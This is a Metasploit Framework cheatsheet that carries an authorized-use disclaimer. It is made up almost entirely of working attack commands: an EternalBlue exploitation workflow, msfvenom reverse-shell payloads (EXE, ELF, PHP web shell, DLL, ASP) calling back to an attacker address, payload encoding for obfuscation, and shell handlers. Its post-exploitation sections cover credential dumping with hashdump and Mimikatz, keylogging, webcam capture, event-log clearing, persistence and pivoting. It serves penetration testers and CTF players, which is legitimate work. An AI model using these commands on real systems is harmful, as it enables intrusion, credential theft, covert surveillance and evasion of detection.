Metasploit Framework Cheatsheet

Default Ports: N/A (framework) — handlers commonly bind 4444/tcp

For authorized testing, CTFs, and lab use only. Always have explicit permission.

Starting Up

msfconsole                 # Launch the console
msfconsole -q              # Launch quietly (no banner)
msfconsole -r script.rc    # Run a resource script on start
msfdb init                 # Initialise the PostgreSQL database
msfdb status               # Check database status
service postgresql start   # Start DB backend (if not running)

Inside the console:

db_status                  # Confirm DB connection
version                    # Show framework version
help                       # List commands
banner                     # Print a random banner

Core Console Commands

Command Description
search <term> Search modules
use <module> Select a module
info Show details of current module
show options Show required/optional settings
show advanced Show advanced options
show payloads List compatible payloads
show targets List target platforms
set <opt> <val> Set an option
setg <opt> <val> Set an option globally (all modules)
unset <opt> Clear an option (unset all for all)
run / exploit Execute the module
back Leave the current module
info -d Open module docs in browser

Searching Modules

search type:exploit platform:windows smb
search cve:2017-0144                  # EternalBlue
search name:eternalblue
search type:auxiliary scanner ssh
search rank:excellent type:exploit struts

Search filters: type: platform: cve: name: rank: author: app: port:

Module Types

Type Purpose
exploit Code that triggers a vulnerability
auxiliary Scanners, fuzzers, sniffers, DoS (no payload)
payload Code run on target after exploitation
encoder Obfuscate/encode payloads
nop NOP generators for padding
post Post-exploitation modules

Working a Module

use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.40
set RPORT 445
set LHOST tun0
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp
check                       # Test if target is vulnerable (if supported)
exploit                     # Or: run
exploit -j                  # Run as background job
exploit -z                  # Don't interact with session on success

Common options: RHOSTS (target), RPORT (target port), LHOST (your IP), LPORT (your listen port), PAYLOAD, TARGET.

Payloads — Staged vs Stageless

Notation Meaning
windows/meterpreter/reverse_tcp Staged/ separators, small stager pulls the rest
windows/meterpreter_reverse_tcp Stageless_ separators, full payload in one shot
reverse_tcp Target connects back to you (good through NAT/firewalls)
bind_tcp You connect to a port the target opens

msfvenom — Payload Generation

# List options
msfvenom -l payloads
msfvenom -l formats
msfvenom -l encoders

# Windows reverse shell EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf

# PHP web shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f raw -o shell.php

# Windows DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f dll -o shell.dll

# ASP / ASPX
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f asp -o shell.asp

# Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.14.5 LPORT=4444 -f raw

# Encoded, multiple iterations
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 \
  -e x86/shikata_ga_nai -i 5 -f exe -o enc.exe

# Avoid bad characters
msfvenom -p ... -b '\x00\x0a\x0d' -f c

Common -f formats: exe, elf, dll, asp, aspx, war, raw, psh, python, c, hex.

Multi/Handler (Catching Shells)

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 4444
set ExitOnSession false
exploit -j                 # Background listener

One-liner from bash:

msfconsole -q -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4444; exploit"

Sessions & Jobs

sessions                   # List active sessions
sessions -i 1              # Interact with session 1
sessions -i 1 -c "whoami"  # Run a command in a session
sessions -u 1              # Upgrade shell to Meterpreter
sessions -k 1              # Kill session 1
sessions -K                # Kill all sessions
background                  # Background current session (Ctrl+Z)

jobs                       # List background jobs
jobs -k <id>               # Kill a job

Meterpreter — System

sysinfo                    # OS / arch info
getuid                     # Current user
getpid                     # Current process ID
ps                         # Process list
getsystem                  # Attempt privilege escalation (Windows)
getprivs                   # List privileges
migrate <pid>              # Migrate into another process
execute -f cmd.exe -i      # Run a program interactively
shell                      # Drop to a system shell
idletime                   # User idle time
reboot / shutdown          # Power control

Meterpreter — Files & Pivoting

pwd / cd / ls / cat        # Filesystem navigation
download <remote> <local>  # Pull a file
upload <local> <remote>    # Push a file
search -f *.txt            # Search for files
edit <file>                # Edit a file

# Pivoting
run autoroute -s 10.10.20.0/24      # Add route through session
portfwd add -l 3389 -p 3389 -r <ip> # Local port forward
portfwd add -L 0.0.0.0 -l 8080 -r <ip> -p 80

Add a SOCKS proxy for tools like proxychains:

use auxiliary/server/socks_proxy
set SRVPORT 1080
set VERSION 5
run -j

Meterpreter — Credentials & Persistence

hashdump                   # Dump local SAM hashes
load kiwi                  # Load Mimikatz (Kiwi)
creds_all                  # Dump all creds (after load kiwi)
lsa_dump_sam
keyscan_start / keyscan_dump / keyscan_stop   # Keylogger
screenshot                 # Capture the desktop
webcam_snap                # Snap a webcam photo
clearev                    # Clear Windows event logs

# Persistence (use with caution / cleanup after)
run persistence -h
exploit/windows/local/persistence

Post-Exploitation Modules

run post/windows/gather/enum_logged_on_users
run post/windows/gather/checkvm
run post/multi/recon/local_exploit_suggester   # Suggest priv-esc exploits
run post/windows/manage/migrate
search post/ platform:linux gather

local_exploit_suggester is the go-to after landing a low-priv session.

Database & Workspaces

workspace                  # List workspaces
workspace -a <name>        # Add and switch to a workspace
workspace <name>           # Switch
db_nmap -sV 10.10.10.0/24  # Run nmap, store results in DB
hosts                      # List discovered hosts
services                   # List discovered services
services -p 445            # Filter by port
vulns                      # List stored vulnerabilities
creds                      # List stored credentials
loot                       # List collected loot
db_export -f xml out.xml   # Export the DB

Resource Scripts & Automation

# Save commands to handler.rc, then:
msfconsole -r handler.rc

# Inside console, record/replay:
makerc /tmp/session.rc     # Save commands run this session
resource /tmp/session.rc   # Replay a resource script

Example handler.rc:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 4444
set ExitOnSession false
exploit -j

Quick Workflow Reference

# 1. Recon into the DB
db_nmap -sCV -p- <target>

# 2. Find a module
search cve:2017-0144

# 3. Configure & verify
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target>
set LHOST tun0
check

# 4. Exploit
exploit

# 5. Post-ex
getuid
run post/multi/recon/local_exploit_suggester
hashdump